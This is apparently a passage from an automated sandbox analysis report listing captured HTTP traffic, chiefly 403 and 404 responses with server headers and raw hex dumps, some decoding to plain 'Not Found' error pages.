e2 04 b4 14 73 a1 8a 03 e0 4c b0 2c a6 4f 26 64 22 11 9c 8b b5 7e 23 32 5a b2 47 ba 9d af 98 e2 74 f6 49 4a 21 61 60 7b 61 bf 1a a8 88 85 da 6c df 75 d3 db 37 77 bd b9 88 37 f0 cf ae 5b 32 50 b6 58 aa 09 38 b6 dd ba 39 a2 94 db 3a 45 48 89 5c b0 6c 02 f6 f1 70 4e e2 98 65 8b a3 f1 6f bb b7 73 32 24 b8 7b 2b 21 29 e3 9b 09 58 24 cf 39 b5 8a 4d a1 68 6a c2 0f 1c 75 f8 33 89 ee ca fe 8f c8 69 82 71 47 17 82 c2 97 5b c3 84 cf 5a 83 c2 84 9f 28 7f a4 8a 45 c4 84 f7 12 cd 80 ea 27 59 61 15 54 b2 04 67 bc d7 a0 f0 41 70 d4 d9 a7 54 fc c5 8c 03 98 13 23 77 9b 74 2e b8 71 bc c3 39 89 1e 16 52 ac b2 d8 8a 34 d2 04 96 05 27 1d db 04 bb 65 96 8a c2 7b f7 c5 39 2c 25 0b 3a 01 49 62 ed 26 0b fd 44 9b 77 88 02 c7 6b c1 78 8c b3 4b 3c d7 0f 8e 11 c1 ce d1 23 94 c4 0d e5 44 e2 1c f0 ed 56 d7 3c 85 34 72 11 69 b8 45 f2 dc 8b 81 82 51 0b 86 de 16 c8 71 2f 47 1a 8c 5b e0 fb 7b a4 e1 c5 48 be d3 02 67 b0 53 93 7d b9 4c 5a e1 3b 91 dc c1 e5 40 1e aa c9 1d ed f5 ed 6d 51 06 ce 5b a1 1c dc 9d b7 33 9d eb fa 26 8c b4 01 5c f7 ad 48 81 df 82 41 f0 9f 08 15 0c 5a 7a 8f 6f 13 aa 91 17 44 81 89 51 60 c2 90 94 13 85 89 ec 6c 7e 58 3a 8d ec 60 ad e9 fc 81 29 eb 30 fa 38 cb 27 a0 e8 93 ba 39 c9 aa 29 98 74 39 df c6 e9 81 84 2f 87 f4 0b a0 17 81 d5 b1 8e c9 8b 12 b9 d7 28 3a 9e 1f d3 85 09 d7 b1 67 db 01 fa dd b5 9d b8 83 a1 d7 d4 59 95 4b f1 ec 40 91 ec 9e 4f d3 b3 3a bb d6 e7 07 c1 b5 64 43 77 75 0e f7 ec 43 00 dd 76 39 1c c8 4a 89 c6 36 c4 93 55 2c 49 2c d6 68 b2 c5 5c 27 24 34 fb fe 66 f7 2a c3 83 53 5f fa 9d 65 78 86 9a 15 bf 8f 19 51 5f 63 4f 33 bb 7e c5 ed 97 53 6c 7d b7 dc d2 6f 4a 66 9d 3d ab 7f cf ab 18 3d 7d 1b 96 7c fa f5 25 1d 4f e0 3a 49 92 d3 0e 30 17 32 a6 d2 d2 6a 5f 15 13 f0 9b 28 56 2a be be ca f4 1a 7d ef d8 64 5e 08 be 52 f4 98 5e 1a cf 6f 9e 9e 9c 26 ea c4 70 e9 54 89 90 69 ed 5f 18 29 b4 63 f9 3a 6a ad e7 31 55 fa 24 e1 6c 81 8b 47 e8 58 54 9e f5 8f ef 53 8a 91 0d 22 e3 1b 28 22 49 69 06 24 8b a1 93 92 27 ab 76 91 81 36 4c b7 e1 3e 2f fa 95 6e f5 c4 c0 6e 1d 91 be 5d 24 08 cb f6 82 38 5a 90 a6 7c e3 e1 ff 21 df 75 8c b5 19 e3 45 03 ae 0e fc eb 71 a2 7f c7 a6 28 8b 97 82 7d a5 3a 50 83 66 9c ed 8a 22 87 a6 e5 e5 56 cf b3 e6 8a 44 4c 4f 95 48 d
                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Thu, 21 Dec 2023 04:03:30 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedvary: Accept-Encodingserver: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4retry-after: 592content-encoding: gzipData Raw: 34 43 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bd 57 59 6f e3 36 10 7e cf af 98 75 60 38 41 25 5b 87 e5 d8 8e 6c 74 bb bb 45 f3 50 b4 d8 64 1f da a2 0f b4 34 b2 d9 50 a2 4a d1 71 bc c5 fe f7 0e 25 f9 52 9c 04 31 8a d2 d6 41 ce f0 e3 70 2e 8e c2 77 b1 8c f4 3a 47 58 e8 54 4c cf 42 f3 00 c1 b2 f9 a4 85 59 6b 7a 46 23 c8 e2 e9 19 50 0b 53 d4 0c a2 05 53 05 ea 49 6b a9 13 7b d8 da 27 65 2c c5 49 eb 81 e3 2a 97 4a b7 20 92 99 c6 8c 58 57 3c d6 8b 49 8c 0f 3c 42 bb ec 58 c0 33 ae 39 13 76 11 31 81 13 d7 82 62 a1 78 76 6f 6b 69 27 5c 4f 32 79 04 5a c9 99 d4 c5 1e 70 26 79 16 e3 a3 05 99 4c a4 10 72 65 de 98 8a 16 fc 01 37 f3 35 d7 02 a7 9f 94 92 0a fa 8e 1f f6 aa 81 8a 58 e8 f5 e6 dd 34 b3 7d 6b db 9b c9 78 0d ff 6c bb 25 03 f2 f9 42 8f c1 75 9c f6 f5 01 a5 dc d6 31 42 ca d4 9c 67 63 70 0e 87 73 16 c7 3c 9b 1f 8c 7f db be bd 24 43 42 bb b7 13 96 72 b1 1e 83 cd f2 5c a0 5d ac 0b 8d a9 05 3f 08 d2 e1 cf 2c ba 2d fb 3f 12 a7 05 ad 5b 9c 4b 84 2f 37 2d 0b 3e 1b 0d 4a 0b 7e 42 f1 80 9a 47 cc 82 f7 8a cc 40 ea 67 59 61 17 a8 78 42 33 de 1b 50 f8 20 05 e9 ec 53 2a ff e2 ad 3d 98 23 23 b7 eb 74 26 45 eb 70 87 33 16 dd cf 95 5c 66 b1 1d 19 a4 31 2c 0a c1 2e 1c 0b 9c b6 55 2a 8a ee 97 cf ce e1 29 9b e3 18 14 8b 8d 9b cc cd 93 6c 7e c1 34 b8 7e 1b 46 23 9a 5d e2 79 c1 f0 10 11 9c 9c 3c 42 2b da 50 ce 14 cd 81 c0 69 5f 5a c7 90 ae 3c 42 1a 6c 90 7c ef 64 a0 e1 55 1b 06 fe 06 c8 f5 4e 47 ea 8f da 10 04 3b a4 c1 c9 48 81 db 06 b7 bf 55 93 73 ba 4c 46 e1 5b 91 bc fe e9 40 3e a9 c9 bb da e9 db df a0 f4 dd b7 42 b9 b4 3b 7f 6b 3a cf 0b 2c b8 32 06 f0 bc b7 22 0d 83 36 f4 87 ff 89 50 c3 7e db ec f1 6d 42 35 f2 82 2c 28 31 4a 4a 18 0a 05 d3 94 c8 5e cc 0f 0b b7 91 1d ec 15 ce ee b9 b6 f7 a3 4f f0 7c 0c 1a 1f f5 f5 51 56 43 a1 a4 2b c4 26 4e f7 24 7c 3e a4 9f 01 3d 09 ac 8e 75 4a 5e c8 d4 4e a3 e4 78 41 8c 73 0b ce 63 df 71 86 e4 77 e7 4e e2 f5 07 7e 53 67 55 2e a5 b3 83 44 72 ba 01 a6 2f ea ec dc 9c 1f 8c d6 52 0d dd d5 39 dc 77 f6 01 4c db e6 70 60 4b 2d 1b db 90 8f 76 b1 60 b1 5c 91 c9 e6 33 93 90 c8 ec bb 9b d3 ad 0c 0f 6e 7d 99 77 9e d1 19 6a 55 fc 01 65 44 73 8d 7c c3 ec 05 15 77 50 4e 71 cc dd f6 4a bf 29 99 4d f6 ac fe 5d bf 62 f4 cd 6d 50 f2 99 d7 e7 74 3c 86 f3 24 49 8e 3b c0 4c aa 18 95 6d d4 be 2c c6 10 34 51 ec 54 7e 7d 95 e9 35 fa ce b1 d9 ac 90 62 a9 f1 90 5e 1a 2f 68 9e 9e 02 13 7d 64 b8 74 aa 44 aa b4 f6 2f 8a 14 bc b0 03 13 b5 f6 d3 98 2a 7d 92 09 3e a7 c5 23 72 2c 54 2f fa c7 f7 29 52 64 83 cc c4 1a 8a 48 21 66 c0 b2 18 2e 52 f6 68 d7 2e d2 37 86 b9 6c b8 cf b3 7e 65 5a 3d 71 e8 b4 0f 48 df 4e 12 84 67 3b 41 5c 23 48 53 be d1 e0 ff 90 ef 3c a6 da 8c 8b a2 01 57 07 fe f9 28 31 bf 43 53 94 c5 4b c1 bf a2 09 d4 61 33 ce b6 45 91 8b 69 79 79 d5 f3 45 73 45 32 c6 63 25 52 b
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundset-cookie: PHPSESSID=bdmjpgckhs0bhq2001gh1oo7d2; path=/expires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cachecontent-type: text/html; charset=utf-8content-encoding: gzipvary: Accept-Encodingcontent-length: 19246date: Thu, 21 Dec 2023 04:03:30 GMTserver: LiteSpeedconnection: Keep-AliveData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed bd 49 93 1b 47 96 20 7c 26 cd e6 3f 78 41 56 56 92 0d 23 13 81 35 93 22 b3 86 22 a9 a5 54 a4 68 22 8b 66 53 8b c1 1c 11 0e 20 12 b1 a0 62 01 89 d4 e8 f0 7d a7 3e 54 cd dc e7 d4 69 d6 3a c8 6c 74 aa 3e c9 4c 3c 34 98 7f e4 fb 25 df 7b ee 1e 11 1e 11 8e 25 c9 0c 76 74 0f a0 2a 26 e0 cb 7b ee cf 9f bf cd b7 7b bf b2 03 2b 5e 2d 18 99 c5 9e 7b 76 fb 1e fe 21 2e f5 a7 f7 5b d1 bc 75 76 fb 36 21 f7 66 8c da 67 b7 6f dd be 45 08 fe f4 58 4c 89 35 a3 61 c4 e2 fb ad 24 9e 18 27 58 30 cb 9a c5 f1 c2 60 7f 4d 9c e5 fd d6 6b 23 a1 86 15 78 0b 1a 3b 63 97 b5 88 15 f8 31 f3 a1 9e c3 ee 33 7b ca 78 4d ac 1a 3b b1 cb ce 1e ce 56 63 4a 7a ed de bd 63 91 90 41 f5 a9 c7 ee b7 6c 16 59 a1 b3 88 9d c0 57 60 bd 58 ff 1c 07 24 8a c3 f5 a5 3f 4f 88 ef 30 72 ce 88 17 5c bd f1 d7 3f 12 7f 7d 79 1e 5d fd d0 2a c3 9a b3 d5 ab 20 b4 23 05 10 2f 83 1f f9 27 ff 40 c2 ed db f7 7e 65 18 51 4c c6 6c ea f8 c4 30 38 75 8a 30 97 0e 7b b5 08 c2 58 81 f9 ca b1 e3 d9 7d 9b 2d 1d 8b 19 fc c7 1d e2 d1 d7 8e 97 78 46 64 51 97 dd 37 ef 10 c7 77 62 87 ba 69 c2 51 bb 45 8e cf 32 84 cc b7 53 74 f7 5c c7 9f 93 90 b9 40 41 0b 89 80 83 07 df 3d 3a 65 c7 4b df 3e f2 1c 2b 0c a2 60 12 1f 89 fc 59 c8 26 f7 5b 38 26 77 8f 8f cf a9 6f cd 13 d7 99 1f 45 f3 63 c7 9b 1e 4f e8 12 8b 61 d9 df 9a 83 61 bb 7d da eb f7 bb 82 54 39 a6 68 06 5d b2 92 98 54 51 be 36 de 17 4d 99 a6 9c a4 39 6e ba 58 b8 cc 88 83 c4 9a 49 54 91 73 c1 a2 fb 2d f3 a4 fd 1a fe af a2 8e ca b8 93 85 1b 50 fb 38 8a e3 19 f3 18 b3 9d 38 08 8f cd c1 a4 37 3c 69 4f 4e c6 27 c3 49 a7 6d b3 61 af d7 6b b7 c7 ed ee d8 1a b7 fb dd a3 85 3f e5 ad ec 74 fa d0 4c 3e 12 82 09 b6 12 1f 6a e5 6d 1b bc 36 07 d7 6f 59 ff 94 0d ed 4e bf 4d db bd 93 71 d7 6c 0f 06 e3 81 d5 ef 9c 9c f6 e9 49 a7 33 a4 37 d0 b2 6e e7 75 b7 73 fd 96 9d 52 cb ec 98 43 eb 04 e8 36 1c 8e 27 9d 31 9d c0 bf d0 b6 ce c4 1c f7 db 7b b5 cc a3 be 33 61 51 9c a2 df 30 3c c7 91 13 b3 a3 57 6c 9c 96 57 01 6b c1 46 f3 0a 17 ee d7 ad 4e 9f b1 93 b1 79 02 5d ea 9f 8e d9 90 4d c6 e3 7e af d7 6f 77 3b 96 69 d1 fe 51 b4 2c 76 cb 0a dc 20 bc df fa 88 f5 7b 76 67 90 b7 46 11 01 5e 84 2c eb 58 14 85 14 c8 3e 7f e2 4c 15 71 70 0d 3e 3d 1e 87 c1 ab 88 85 02 c6 d1 6b cf ad 52 42 23 22 8a 53 37 5e b9 2c 9a 31 16 97 a9 33 81 16 45 47 d3 20 98 ba 8c 2e 9c e8 08 c4 f4 b1 15 45 bf 9d 50 cf 71 57 f7 5f 06 ae 3b 0f 42 ff 6e c8 a6 89 4b c3 16 f1 a0 61 14 66 a4 eb 56 04 84 16 4b b9 97 bc 73 d1 71 1c 52 3f 9a 04 a1 c7 c2 63 1a 81 12 89 8e 2d 6a cd 98 c8 37 ba d4 b6 4f 27 c0 fc 47 d0 98 12 52 f1 41 51 0c e8 85 26 90 9c 1e b3 d7 31 60 5b 52 91 9a 8d 0c 21 4b 1a 12 00 19 07 16 0d e3 11 b0 94 c
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 04:03:30 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-40.ec2.internalX-Request-Id: 5b06aafa-ea34-4f36-9925-26870350376aData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 04:03:30 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-117.ec2.internalX-Request-Id: 31aec87a-881b-4e3f-a8b8-d573251b9c28Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 04:03:30 GMTServer: ApacheX-Frame-Options: SAMEORIGINLast-Modified: Mon, 23 Mar 2020 06:02:46 GMTETag: "415-5a17f6251cd80"Accept-Ranges: bytesContent-Length: 1045Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 e6 8c 87 e5 ae 9a e3 81 95 e3 82 8c e3 81 9f e3 83 95 e3 82 a1 e3 82 a4 e3 83 ab ef bc 88 55 52 4c ef bc 89 e3 81 8c e3 81 bf e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 7a 65 6e 6c 6f 67 69 63 5f 70 61 67 65 73 2f 63 73 73 2f 64 65 66 61 75 6c 74 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 6f 74 6e 65 6e 74 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 64 65 2d 62 6c 6f 63 6b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 45 52 52 4f 52 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 65 73 73 61 67 65 2d 68 65 61 64 69 6e 67 22 3e e6 8c 87 e5 ae 9a e3 81 95 e3 82 8c e3 81 9f e3 83 9a e3 83 bc e3 82 b8 e3 81 be e3 81 9f e3 81 af e3 83 95 e3 82 a1 e3 82 a4 e3 83 ab e3 81 af e5 ad 98 e5 9c a8 e3 81 97 e3 81 be e3 81 9b e3 82 93 e3 80 82 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 6d 65 73 73 61 67 65 2d 74 78 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e e3 83 bb 55 52 4c e3 80 81 e3 83 95 e3 82 a1 e3 82 a4 e3 83 ab e5 90 8d e3 81 ab e3 82 bf e3 82 a4 e3 83 97 e3 83 9f e3 82 b9 e3 81 8c e3 81 aa e3 81 84 e3 81 8b e3 81 94 e7 a2 ba e8 aa 8d e3 81 8f e3 81 a0 e3 81 95 e3 81 84 e3 80 82 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e e3 83 bb e6 8c 87 e5 ae 9a e3 81 95 e3 82 8c e3 81 9f e3 83 9a e3 83 bc e3 82 b8 e3 81 af e5 89 8a e9 99 a4 e3 81 95 e3 82 8c e3 81 9f e3 81 8b e3 80 81 e7 a7 bb e5 8b 95 e3 81 97 e3 81 9f e5 8f af e8 83 bd e6 80 a7 e3 81 8c e3 81 82 e3 82 8a e3 81 be e3 81 99 e3 80 82 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 7a 65 6e 6c 6f
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cachecontent-type: text/html; charset=utf-8content-encoding: gzipvary: Accept-Encodingcontent-length: 19249date: Thu, 21 Dec 2023 04:03:30 GMTserver: LiteSpeedconnection: Keep-AliveData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed bd 49 93 1b 47 96 20 7c 26 cd e6 3f 78 41 56 56 92 0d 23 13 81 35 93 22 b3 86 22 a9 a5 54 a4 68 22 8b 66 53 8b c1 1c 11 0e 20 12 b1 a0 62 01 89 d4 e8 f0 7d a7 3e 54 cd dc e7 d4 69 d6 3a c8 6c 74 aa 3e c9 4c 3c 34 98 7f e4 fb 25 df 7b ee 1e 11 1e 11 8e 25 c9 0c 76 74 0f a0 2a 26 e0 cb 7b ee cf 9f bf cd b7 7b bf b2 03 2b 5e 2d 18 99 c5 9e 7b 76 fb 1e fe 21 2e f5 a7 f7 5b d1 bc 75 76 fb 36 21 f7 66 8c da 67 b7 6f dd be 45 08 fe f4 58 4c 89 35 a3 61 c4 e2 fb ad 24 9e 18 27 58 30 cb 9a c5 f1 c2 60 7f 4d 9c e5 fd d6 6b 23 a1 86 15 78 0b 1a 3b 63 97 b5 88 15 f8 31 f3 a1 9e c3 ee 33 7b ca 78 4d ac 1a 3b b1 cb ce 1e ce 56 63 4a 7a ed de bd 63 91 90 41 f5 a9 c7 ee b7 6c 16 59 a1 b3 88 9d c0 57 60 bd 58 ff 1c 07 24 8a c3 f5 a5 3f 4f 88 ef 30 72 ce 88 17 5c bd f1 d7 3f 12 7f 7d 79 1e 5d fd d0 2a c3 9a b3 d5 ab 20 b4 23 05 10 2f 83 1f f9 27 ff 40 c2 ed db f7 7e 65 18 51 4c c6 6c ea f8 c4 30 38 75 8a 30 97 0e 7b b5 08 c2 58 81 f9 ca b1 e3 d9 7d 9b 2d 1d 8b 19 fc c7 1d e2 d1 d7 8e 97 78 46 64 51 97 dd 37 ef 10 c7 77 62 87 ba 69 c2 51 bb 45 8e cf 32 84 cc b7 53 74 f7 5c c7 9f 93 90 b9 40 41 0b 89 80 83 07 df 3d 3a 65 c7 4b df 3e f2 1c 2b 0c a2 60 12 1f 89 fc 59 c8 26 f7 5b 38 26 77 8f 8f cf a9 6f cd 13 d7 99 1f 45 f3 63 c7 9b 1e 4f e8 12 8b 61 d9 df 9a 83 61 bb 7d da eb f7 bb 82 54 39 a6 68 06 5d b2 92 98 54 51 be 36 de 17 4d 99 a6 9c a4 39 6e ba 58 b8 cc 88 83 c4 9a 49 54 91 73 c1 a2 fb 2d f3 a4 fd 1a fe af a2 8e ca b8 93 85 1b 50 fb 38 8a e3 19 f3 18 b3 9d 38 08 8f cd c1 a4 37 3c 69 4f 4e c6 27 c3 49 a7 6d b3 61 af d7 6b b7 c7 ed ee d8 1a b7 fb dd a3 85 3f e5 ad ec 74 fa d0 4c 3e 12 82 09 b6 12 1f 6a e5 6d 1b bc 36 07 d7 6f 59 ff 94 0d ed 4e bf 4d db bd 93 71 d7 6c 0f 06 e3 81 d5 ef 9c 9c f6 e9 49 a7 33 a4 37 d0 b2 6e e7 75 b7 73 fd 96 9d 52 cb ec 98 43 eb 04 e8 36 1c 8e 27 9d 31 9d c0 bf d0 b6 ce c4 1c f7 db 7b b5 cc a3 be 33 61 51 9c a2 df 30 3c c7 91 13 b3 a3 57 6c 9c 96 57 01 6b c1 46 f3 0a 17 ee d7 ad 4e 9f b1 93 b1 79 02 5d ea 9f 8e d9 90 4d c6 e3 7e af d7 6f 77 3b 96 69 d1 fe 51 b4 2c 76 cb 0a dc 20 bc df fa 88 f5 7b 76 67 90 b7 46 11 01 5e 84 2c eb 58 14 85 14 c8 3e 7f e2 4c 15 71 70 0d 3e 3d 1e 87 c1 ab 88 85 02 c6 d1 6b cf ad 52 42 23 22 8a 53 37 5e b9 2c 9a 31 16 97 a9 33 81 16 45 47 d3 20 98 ba 8c 2e 9c e8 08 c4 f4 b1 15 45 bf 9d 50 cf 71 57 f7 5f 06 ae 3b 0f 42 ff 6e c8 a6 89 4b c3 16 f1 a0 61 14 66 a4 eb 56 04 84 16 4b b9 97 bc 73 d1 71 1c 52 3f 9a 04 a1 c7 c2 63 1a 81 12 89 8e 2d 6a cd 98 c8 37 ba d4 b6 4f 27 c0 fc 47 d0 98 12 52 f1 41 51 0c e8 85 26 90 9c 1e b3 d7 31 60 5b 52 91 9a 8d 0c 21 4b 1a 12 00 19 07 16 0d e3 11 b0 94 c7 47 86 dc 27 e6 a7 85 42 e3 e7 94 25 2f 42 67 3a 65 e1 37
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 04:03:30 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-181.ec2.internalX-Request-Id: 32c40a2d-6bbf-4af4-a5ac-9d14e72b07d8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 04:03:30 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-165.ec2.internalX-Request-Id: 39afc8bb-732b-4e40-b727-c7a2bbfdfcc3Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 04:03:29 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Dec 2023 04:03:29 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 